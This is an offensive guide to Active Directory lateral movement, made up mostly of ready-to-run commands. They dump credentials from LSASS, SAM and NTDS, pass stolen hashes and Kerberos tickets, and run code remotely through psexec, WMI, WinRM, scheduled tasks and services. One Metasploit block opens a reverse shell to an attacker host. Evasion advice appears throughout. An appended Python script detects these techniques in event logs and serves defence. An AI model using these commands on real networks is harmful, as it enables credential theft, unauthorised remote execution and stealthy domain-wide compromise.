This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Lateral Movement

Understanding Lateral Movement in AD

Core Concept

Purpose: Move from one compromised system to another within an Active Directory environment to escalate privileges, access sensitive data, or reach target objectives.

Attack Flow:

Initial Compromise → Credential Extraction → Authentication to New Systems → Repeat Process
  • Extract credentials from compromised system

  • Use stolen authentication material to access other systems

  • Establish persistence and extract more credentials

  • Continue until objective is achieved

Requirements: Initial system compromise, extracted authentication material, network access to targets

Attack Value: Domain-wide access, privilege escalation, persistent access to sensitive systems


Pass-the-Hash (PtH) Attacks

NTLM Hash Overview

Service Purpose: The NT hash (an unsalted MD4 of the UTF-16LE password) is the key material for NTLM challenge-response authentication, which Windows still uses for local accounts, for SMB access by IP address, and wherever Kerberos is unavailable.

Why Target NTLM Hashes: The NTLM exchange proves possession of the hash, not of the password, so a stolen hash authenticates directly without cracking, enabling immediate lateral movement.

Pass-the-Hash Attack

Purpose: Use extracted NTLM hashes to authenticate to other systems without knowing the plaintext password.

Requirements: NT hash of the account; local administrator rights on the target for command execution (for local accounts other than the RID 500 Administrator this additionally needs LocalAccountTokenFilterPolicy=1, otherwise the remote token is UAC-filtered); targets that still accept NTLM (not blocked by "Network security: Restrict NTLM" policies)

Attack Value: Immediate access; password strength is irrelevant because the unsalted hash itself is the credential

NTLM Hash Extraction

Using Impacket Tools

# Dump everything reachable remotely: SAM, LSA secrets, cached domain logons, and NTDS if the target is a DC (needs local admin)
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>

# Same, authenticating with a hash instead of a password
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Parse registry hives saved from the target offline (e.g. reg save HKLM\SAM SAM.save on the host); -sam/-security/-system take file paths
python3 secretsdump.py -sam SAM.save -security SECURITY.save -system SYSTEM.save LOCAL

# Against a DC, pull only the NT hashes from NTDS.dit via DRSUAPI (needs Domain Admin or DCSync rights)
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-ntlm

# Cached domain logons (DCC2) appear in the default remote dump; they cannot be passed, only cracked offline

Using Mimikatz (Windows)

# Extract NT hashes (and sometimes plaintexts) of logged-on users from LSASS memory (needs local admin; fails under LSA protection or Credential Guard)
mimikatz "privilege::debug" "sekurlsa::logonpasswords"

# Extract from the SAM database (token::elevate provides the SYSTEM token lsadump needs)
mimikatz "privilege::debug" "token::elevate" "lsadump::sam"

# Extract cached domain logons (DCC2 hashes: not passable, crack them offline)
mimikatz "privilege::debug" "token::elevate" "lsadump::cache"

Using CrackMapExec

# Extract SAM hashes from every host where the account is local admin (such hosts are marked (Pwn3d!) in the output)
crackmapexec smb <network-range> -u '<username>' -p '<password>' --sam

# Add --local-auth when <username> is a local account rather than a domain account
crackmapexec smb <network-range> -u '<username>' -p '<password>' --local-auth --sam

# Extract NTDS.dit hashes from a domain controller over DRSUAPI (needs Domain Admin or DCSync rights)
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds

Pass-the-Hash Execution

Using Impacket Tools

# -hashes takes LMHASH:NTHASH; leaving the LM half empty (":<NTLM-hash>") is fine, modern systems store no LM hash
# Access file shares over SMB
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Remote command execution (all three need local admin on the target)
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

Using CrackMapExec

# Pass-the-hash across a network range; (Pwn3d!) marks hosts where the account is local admin (add --local-auth for local accounts)
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash> --continue-on-success

# Execute commands via PtH
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> -x "whoami"

# Dump additional credentials (SAM, plus LSA secrets and cached logons)
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> --sam --lsa

Using Metasploit

# Metasploit takes the hash in SMBPass as LM:NT; put the blank LM hash aad3b435b51404eeaad3b435b51404ee in front of the NT hash
# SMB login with hash
use auxiliary/scanner/smb/smb_login
set RHOSTS <target-IP>
set SMBDomain <domain>
set SMBUser <username>
set SMBPass aad3b435b51404eeaad3b435b51404ee:<NTLM-hash>
run

# PSExec with hash
use exploit/windows/smb/psexec
set RHOSTS <target-IP>
set SMBDomain <domain>
set SMBUser <username>
set SMBPass aad3b435b51404eeaad3b435b51404ee:<NTLM-hash>
run

Pass-the-Ticket (PtT) Attacks

Kerberos Ticket Overview

Service Purpose: Kerberos tickets (a TGT issued by the KDC, and the service tickets/TGS obtained with it for specific SPNs) are the authentication tokens in Active Directory, providing single sign-on for the lifetime of the ticket.

Why Target Kerberos Tickets: A ticket held in memory or on disk can be copied into another logon session and replayed until it expires; no password, hash or key is needed, because the KDC has already issued it.

Pass-the-Ticket Attack

Purpose: Extract and reuse Kerberos tickets to authenticate as other users on different systems.

Requirements: A valid ticket still within its lifetime (TGT default 10 hours, renewable for 7 days; a service ticket only works for the SPN it was issued for), targets in the same or a trusting domain, and, when holding only a TGT, access to a DC on port 88 to obtain service tickets

Attack Value: User impersonation without any credential material, session hijacking, privilege escalation

Kerberos Ticket Extraction

Using Mimikatz (Windows)

# List the current logon session's tickets
mimikatz "kerberos::list"

# Export the current session's tickets to .kirbi files
mimikatz "kerberos::list /export"

# Export the tickets of every logon session from LSASS (needs local admin; blocked by LSA protection or Credential Guard)
mimikatz "privilege::debug" "sekurlsa::tickets /export"

# kerberos::list has no per-user filter: pick the target user's tickets from the exported .kirbi filenames, which embed the client name and SPN

Using Impacket Tools

# getTGT.py does not extract tickets; it requests a fresh TGT from the DC using known credentials (password, hash or AES key)
python3 getTGT.py <domain>/<username>:<password> -dc-ip <DC-IP>

# Tickets exported on Windows (.kirbi) must be converted to .ccache before Impacket can use them (see Cross-Platform Ticket Conversion below)

Using Rubeus (Windows)

# Dump the current user's tickets (unelevated: the current logon session only)
Rubeus.exe dump /nowrap

# Dump the tickets of all logon sessions (requires elevation); /service:krbtgt limits the output to TGTs
Rubeus.exe dump /service:krbtgt /nowrap

# Restrict to one logon session (find LUIDs with 'Rubeus.exe triage')
Rubeus.exe dump /luid:<LUID> /nowrap

# Monitor for new TGTs every 5 seconds, e.g. to catch an admin logging on to this host
Rubeus.exe monitor /interval:5 /filteruser:<username>

Pass-the-Ticket Execution

Using Impacket Tools

# Point Impacket at the ticket cache
export KRB5CCNAME=<ticket.ccache>

# Authenticate with the ticket (no password needed). Address the target by hostname/FQDN: the service principal (cifs/<host>)
# is built from it, and an IP address gives an SPN the KDC cannot resolve
python3 psexec.py <domain>/<username>@<target-server-FQDN> -k -no-pass -dc-ip <DC-IP>
python3 smbclient.py <domain>/<username>@<target-server-FQDN> -k -no-pass -dc-ip <DC-IP>
python3 wmiexec.py <domain>/<username>@<target-server-FQDN> -k -no-pass -dc-ip <DC-IP>

Using Mimikatz (Windows)

# Inject ticket into current session
mimikatz "kerberos::ptt <ticket.kirbi>"

# Use the injected ticket (name the target by hostname; an IP address would fall back to NTLM)
klist
dir \\<target-server>\c$
psexec \\<target-server> cmd

Cross-Platform Ticket Conversion

# Convert Mimikatz tickets (.kirbi) to Unix format (.ccache)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

# Convert ccache to kirbi
python3 ticketConverter.py <ticket.ccache> <ticket.kirbi>

Over-Pass-the-Hash (Pass-the-Key)

Hybrid Authentication Overview

Service Purpose: Over-pass-the-hash uses an account's NT hash (or its AES Kerberos keys) as the pre-authentication key to request a TGT, turning NTLM credential material into Kerberos tickets.

Why Use Over-Pass-the-Hash: Enables Kerberos authentication from a hash or key alone, which works where NTLM is restricted. With an AES key the traffic looks like a normal logon; with the NT hash the AS-REQ is forced to RC4 (etype 0x17), which stands out in AES-only domains.

Over-Pass-the-Hash Attack

Purpose: Use NTLM hashes or AES keys to request Kerberos TGTs, then use those tickets for authentication.

Requirements: NT hash or AES key of the account, network access to a domain controller on port 88 for the TGT request

Attack Value: Reaches Kerberos-only and NTLM-restricted targets, and the resulting TGT feeds further Kerberos attacks (service ticket requests, delegation abuse); prefer the AES256 key over the NT hash to avoid the RC4 downgrade signature

Over-Pass-the-Hash Execution

Using Impacket Tools

# Request TGT using NTLM hash (AS-REQ with RC4, etype 0x17)
python3 getTGT.py <domain>/<username> -hashes :<NTLM-hash> -dc-ip <DC-IP>

# Request TGT using AES key (etype 0x12 for AES256, matching a normal Windows client)
python3 getTGT.py <domain>/<username> -aesKey <AES-key> -dc-ip <DC-IP>

# Use the obtained TGT; getTGT.py writes it to <username>.ccache in the current directory
export KRB5CCNAME=<username>.ccache
python3 psexec.py <domain>/<username>@<target-server-FQDN> -k -no-pass -dc-ip <DC-IP>

Using Mimikatz (Windows)

# Over-pass-the-hash with NTLM: spawns a process whose logon session carries the hash (needs local admin and debug privilege)
mimikatz "privilege::debug" "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM-hash> /run:cmd"

# Over-pass-the-hash with AES256 (avoids the RC4 downgrade; supply the key instead of the NT hash, not alongside it)
mimikatz "privilege::debug" "sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES-key> /run:cmd"

# The new cmd window starts with an empty ticket cache; the TGT is only requested on the first Kerberos authentication
# In the new cmd window:
dir \\<target-server>\c$
klist  # Now shows the TGT (and a cifs/ service ticket) for <username>

Using Rubeus (Windows)

# Request TGT using NTLM hash (RC4, etype 0x17); /ptt injects it straight into the current logon session
Rubeus.exe asktgt /user:<username> /domain:<domain> /rc4:<NTLM-hash> /ptt

# Request TGT using AES256 key; /opsec makes the AS-REQ sequence mimic a real Windows client
Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<AES-key> /opsec /ptt

# Or inject a previously obtained base64 ticket
Rubeus.exe ptt /ticket:<base64-ticket>

Remote Execution Techniques

Windows Remote Execution Services

Service Purpose: Various Windows services enable remote command execution for administrative purposes, which can be abused for lateral movement.

Remote Execution Methods

PSExec-style Execution

Using Impacket PSExec

# SMB-based remote execution: uploads a service binary to ADMIN$ and creates a service (System event 7045 on the target),
# which makes it the noisiest option; needs local admin
python3 psexec.py <domain>/<username>:<password>@<target-IP>
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Kerberos authentication (target by hostname, see Pass-the-Ticket)
export KRB5CCNAME=<ticket.ccache>
python3 psexec.py <domain>/<username>@<target-server-FQDN> -k -no-pass -dc-ip <DC-IP>

Using Metasploit PSExec

use exploit/windows/smb/psexec
set RHOSTS <target-IP>
set SMBDomain <domain>
set SMBUser <username>
set SMBPass <password>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker-IP>
run

WMI-based Execution

Using Impacket WMIExec

# WMI remote execution over DCE/RPC (135 plus a dynamic high port): no service is created, but by default command output
# is written to a file on the ADMIN$ share and read back over SMB; -nooutput avoids that share access
python3 wmiexec.py <domain>/<username>:<password>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Run a single command instead of the semi-interactive shell
python3 wmiexec.py <domain>/<username>:<password>@<target-IP> "whoami"

Using CrackMapExec WMI

# WMI command execution
crackmapexec wmi <target-IP> -u '<username>' -p '<password>' -x "whoami"
crackmapexec wmi <target-IP> -u '<username>' -H <NTLM-hash> -x "powershell -enc <base64-command>"

DCOM-based Execution

Using Impacket DCOMExec

# DCOM remote execution
python3 dcomexec.py <domain>/<username>:<password>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Specify DCOM object
python3 dcomexec.py <domain>/<username>:<password>@<target-IP> -object MMC20

WinRM-based Execution

Using Evil-WinRM

# Windows Remote Management (5985, or 5986 over TLS); the account must be a local Administrator or in Remote Management Users on the target
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i <target-IP> -u <username> -H <NTLM-hash>

# File upload/download from inside the Evil-WinRM shell
upload <local-file> <remote-path>
download <remote-file> <local-path>

Using CrackMapExec WinRM

# WinRM authentication testing (and command execution with -x)
crackmapexec winrm <target-IP> -u '<username>' -p '<password>'
crackmapexec winrm <target-IP> -u '<username>' -H <NTLM-hash>
crackmapexec winrm <target-IP> -u '<username>' -H <NTLM-hash> -x "whoami"

Service-Specific Remote Execution

RDP-based Access

# Remote Desktop Protocol
rdesktop <target-IP> -u <username> -p <password>
xfreerdp /v:<target-IP> /u:<username> /p:<password>

# RDP with pass-the-hash only works when Restricted Admin mode is enabled on the target
# (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0); otherwise the logon is rejected
xfreerdp /v:<target-IP> /u:<username> /d:<domain> /pth:<NTLM-hash>

SSH-based Access (Windows OpenSSH)

# If OpenSSH Server is installed on the Windows target (port 22); remote paths are Windows paths
ssh <username>@<target-IP>
scp <file> <username>@<target-IP>:C:/path/

Living off the Land (LotL) Techniques

Native Windows Tools for Lateral Movement

Purpose: Use legitimate Windows binaries and features to perform lateral movement without deploying additional tools.

Attack Value: Bypass detection, appear as legitimate admin activity, use trusted binaries.

Built-in Windows Remote Tools

PowerShell Remoting

# Enable-PSRemoting configures the WinRM listener on the machine it is run on (the target, not the attacker); it is on by default on Windows Server
Enable-PSRemoting -Force

# Remote PowerShell session (the user must be a local Administrator or in Remote Management Users on the target)
$cred = Get-Credential
Enter-PSSession -ComputerName <target-server> -Credential $cred

# Run commands on remote systems
Invoke-Command -ComputerName <target-server> -Credential $cred -ScriptBlock {Get-Process}

# One-liner remote execution
powershell "Invoke-Command -ComputerName <target> -Credential (Get-Credential) -ScriptBlock {whoami}"

Windows Remote Management (WinRM)

# Test WinRM connectivity
winrs -r:<target-server> -u:<username> -p:<password> ipconfig

# Remote command execution
winrs -r:<target-server> -u:<domain>\<username> -p:<password> "powershell Get-Process"

# Interactive session
winrs -r:<target-server> -u:<username> -p:<password> cmd

WMIC Remote Execution

# wmic.exe is deprecated (Windows 10 21H1 onward) and no longer installed by default on recent Windows 11 builds; where it is present:
# Remote process execution via WMI (the process output is not returned, hence the redirect to a file on the target)
wmic /node:<target-server> /user:<username> /password:<password> process call create "cmd.exe /c whoami > C:\temp\output.txt"

# Query remote system information
wmic /node:<target-server> /user:<username> /password:<password> computersystem get name,domain,model

# Remote service management
wmic /node:<target-server> /user:<username> /password:<password> service where name="Spooler" call startservice

PsExec (Sysinternals)

# Microsoft Sysinternals PsExec
psexec \\<target-server> -u <domain>\<username> -p <password> cmd

# Execute specific commands
psexec \\<target-server> -u <domain>\<username> -p <password> -c local_script.bat

# Copy and execute
psexec \\<target-server> -u <domain>\<username> -p <password> -c -f payload.exe

Scheduled Tasks for Remote Execution and Persistence

# Create remote scheduled task
schtasks /create /tn "UpdateTask" /tr "powershell.exe -enc <base64-payload>" /sc onlogon /ru SYSTEM /s <target-server> /u <domain>\<username> /p <password>

# Execute scheduled task
schtasks /run /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password>

# Delete scheduled task
schtasks /delete /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password> /f

Service-based Lateral Movement

# Create remote service (the space after binPath= is required; the caller needs local admin on the target)
sc \\<target-server> create "UpdateService" binPath= "cmd.exe /c powershell.exe -enc <base64-payload>"

# Start remote service: cmd.exe is not a real service binary, so sc reports error 1053, but the command has already run by then
sc \\<target-server> start "UpdateService"

# Delete remote service
sc \\<target-server> delete "UpdateService"

# Using net commands: map IPC$, copy the payload over C$, then register and start it as a service (System event 7045 on the target)
net use \\<target-server>\ipc$ /user:<domain>\<username> <password>
copy payload.exe \\<target-server>\c$\temp\
sc \\<target-server> create "TempService" binPath= "C:\temp\payload.exe"
sc \\<target-server> start "TempService"

Registry-based Remote Execution

# Remote registry writes need the Remote Registry service running on the target and local admin rights
# Enable RDP remotely via registry (the firewall may still block 3389)
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Hijack an existing service's binary path; takes effect the next time the service starts
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<service>" /v ImagePath /t REG_SZ /d "C:\temp\payload.exe" /f

Advanced Lateral Movement Techniques

Token Impersonation

# Token impersonation: reuse the access token of another logged-on user's process instead of their credentials
# (needs SYSTEM or local admin on the host; Meterpreter's Incognito extension is the usual tool)
load incognito
list_tokens -u
impersonate_token "<domain>\\<username>"

Named Pipe Impersonation

# A process creates a named pipe, gets a privileged client (e.g. a SYSTEM service) to connect to it, and calls
# ImpersonateNamedPipeClient to run under that client's token; Meterpreter's getsystem technique 1 implements this,
# anything else requires custom tooling
getsystem -t 1

DCOM Lateral Movement

# Abuse DCOM objects for remote execution (needs local admin on the target; RPC 135 plus a dynamic port);
# ExecuteShellCommand on MMC20.Application runs the command under the caller's identity on the target
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<target-server>"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")

Integrated Lateral Movement Strategy

Progressive Network Compromise

# Phase 1: Initial credential extraction (needs local admin on the first host)
python3 secretsdump.py <domain>/<username>:<password>@<initial-target>

# Phase 2: Pass-the-hash to nearby systems; hosts marked (Pwn3d!) are those where the account is local admin
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash> --continue-on-success

# Phase 3: Extract additional credentials from the new systems
crackmapexec smb <new-targets> -u '<username>' -H <NTLM-hash> --sam --lsa

# Phase 4: Kerberoast service accounts; the output is service ticket hashes that must be cracked offline before they are usable
python3 GetUserSPNs.py <domain>/<username> -hashes :<NTLM-hash> -dc-ip <DC-IP> -request

# Phase 5: Kerberos-based lateral movement as the cracked service account
python3 getTGT.py <domain>/<service-account>:<cracked-password> -dc-ip <DC-IP>
export KRB5CCNAME=<service-account>.ccache
python3 wmiexec.py <domain>/<service-account>@<high-value-target-FQDN> -k -no-pass -dc-ip <DC-IP>

Lateral Movement Decision Matrix

Technique          | Stealth Level | Network Traffic              | Requirements      | Detection Risk
-------------------|---------------|------------------------------|-------------------|---------------
Pass-the-Hash      | Medium        | SMB/445                      | NTLM hash         | Medium
Pass-the-Ticket    | High          | Kerberos/88                  | Valid ticket      | Low
Over-Pass-the-Hash | High          | Kerberos/88                  | NTLM hash/AES key | Low
WMI Execution      | High          | RPC/135 + dynamic high port  | Credentials       | Low
PSExec             | Low           | SMB/445                      | Credentials       | High
WinRM              | Medium        | WinRM/5985 (5986 over TLS)   | Credentials       | Medium
Living off Land    | Very High     | Various                      | Credentials       | Very Low

Ratings are relative: every row still produces a 4624 network logon on the target, PSExec-style execution adds a 7045 service install, and over-pass-the-hash with an NT hash forces RC4 (4768 with etype 0x17), which is loud in AES-only domains.

Attack Success Indicators

  • Pass-the-Hash: SMB authentication without password knowledge

  • Pass-the-Ticket: Kerberos authentication with stolen tickets

  • Over-Pass-the-Hash: Kerberos tickets obtained via NTLM hashes

  • Remote Execution: Command execution on target systems

  • Living off the Land: Legitimate tools used for malicious purposes
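The detection side of the matrix and indicators above, as an added example that is not part of the original page: three small rules run over constructed Windows Security and System event records (JSON, one per line, field names as in the Windows event XML). The thresholds, the "AES is expected" assumption behind the RC4 rule, and the sample hosts and accounts are my own choices, not vendor rules.

```python
"""
Added example, not from the original page: detecting pass-the-hash sprays,
over-pass-the-hash RC4 downgrades and PsExec-style service installs over a
handful of constructed Windows event records.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_HOSTS = 3                       # distinct targets from one (source IP, account) ...
SPRAY_WINDOW = timedelta(minutes=5)   # ... within this window => pass-the-hash style spray (illustrative threshold)
RC4 = "0x17"                          # 4768 TicketEncryptionType for RC4-HMAC, i.e. the NT hash used as Kerberos key
SVC_BIN_RE = re.compile(r"(cmd\.exe\s*/c|powershell(\.exe)?\s+-(enc|e|encodedcommand))", re.I)

# Constructed sample: 10.0.0.50 replays svc_backup's NT hash against three servers over SMB (4624 type 3 / NTLM),
# requests a TGT with RC4 (4768), and installs cmd.exe- and PSEXESVC-based services (7045). jdoe is normal Kerberos traffic.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:00:01", "Computer": "SRV01", "TargetUserName": "svc_backup",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.50"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:00:04", "Computer": "SRV02", "TargetUserName": "svc_backup",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.50"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:00:09", "Computer": "SRV03", "TargetUserName": "svc_backup",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.50"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:30:00", "Computer": "SRV01", "TargetUserName": "jdoe",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.77"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:01:00", "Computer": "DC01", "TargetUserName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:02:00", "Computer": "DC01", "TargetUserName": "jdoe",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.77"},
    {"EventID": 7045, "TimeCreated": "2024-05-01T09:03:00", "Computer": "SRV02", "ServiceName": "UpdateService",
     "ImagePath": "cmd.exe /c powershell.exe -enc SQBFAFgA"},
    {"EventID": 7045, "TimeCreated": "2024-05-01T09:04:00", "Computer": "SRV03", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
])


def load_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_ntlm_spray(events):
    """4624 type-3 NTLM logons: one (source IP, account) reaching >= SPRAY_HOSTS distinct hosts within SPRAY_WINDOW."""
    by_key = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4624 and e.get("LogonType") == "3" and e.get("AuthenticationPackageName") == "NTLM":
            by_key[(e["IpAddress"], e["TargetUserName"].lower())].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["Computer"]))
    hits = []
    for (src, user), logons in by_key.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):        # sliding window anchored at each logon
            hosts = {h for t, h in logons[i:] if t - t0 <= SPRAY_WINDOW}
            if len(hosts) >= SPRAY_HOSTS:
                hits.append({"source": src, "user": user, "hosts": sorted(hosts)})
                break
    return hits


def detect_rc4_tgt(events):
    """4768 with RC4 etype: in a domain whose accounts have AES keys this is the over-pass-the-hash signature."""
    return [{"user": e["TargetUserName"], "source": e["IpAddress"]}
            for e in events if e.get("EventID") == 4768 and e.get("TicketEncryptionType", "").lower() == RC4]


def detect_remote_service_exec(events):
    """7045 service installs whose name (PSEXESVC) or binary path (cmd.exe /c, powershell -enc) means remote execution."""
    hits = []
    for e in events:
        if e.get("EventID") != 7045:
            continue
        if e.get("ServiceName", "").upper() == "PSEXESVC" or SVC_BIN_RE.search(e.get("ImagePath", "")):
            hits.append({"host": e["Computer"], "service": e["ServiceName"], "image": e["ImagePath"]})
    return hits


def run_all(text):
    ev = load_events(text)
    return {"ntlm_spray": detect_ntlm_spray(ev), "rc4_tgt": detect_rc4_tgt(ev),
            "service_exec": detect_remote_service_exec(ev)}


if __name__ == "__main__":
    print(json.dumps(run_all(SAMPLE_EVENTS), indent=2))
```

The spray rule deliberately keys on NTLM over logon type 3, which is what a hash replayed by IP address looks like, while jdoe's Kerberos logon is ignored; the RC4 rule is only meaningful once the domain's accounts have AES keys, so exclude known-legacy accounts before alerting on it.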

These lateral movement techniques enable rapid domain compromise by leveraging stolen credentials and legitimate Windows functionality to move between systems while maintaining stealth and avoiding detection.
